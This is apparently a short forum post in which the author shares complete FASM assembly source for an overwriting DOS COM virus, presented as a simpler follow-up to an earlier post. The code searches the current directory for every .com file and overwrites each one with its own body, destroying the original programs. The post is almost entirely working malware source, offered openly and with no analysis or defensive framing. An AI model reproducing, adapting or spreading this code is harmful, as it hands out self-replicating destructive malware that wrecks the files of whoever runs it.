Hello everyone, I wanted to show a simpler example of my previous post. This is an overwritting COM virus in FASM:
org 100h
start:
xor cx, cx ; normal file attributes
mov dx, comfile ; comfile wild card
mov ah, 4eh ; find first file
next:
int 21h ; find file
jc exit ; if error, exit
infect:
mov ax, 3d02h ; open read/write
mov dx, 9eh ; 9eh = offset in DTA of file found with 4eh/4fh
int 21h ; open it
xchg ax, bx ; save handle
mov ah, 40h ; write function
mov dx, start ; copy starting at 'start'
mov cx, vend-start ; size = vend-start
int 21h ; infect
mov ah, 3eh ;close file handle
int 21h ; close it
mov ah, 4fh ; find next file
jmp next ; jump back to search loop
exit:
int 20h ; standard COM exit
comfile db "*.com", 0 ; com wildcard always NULLED at end
vend: ;end of code for size calculation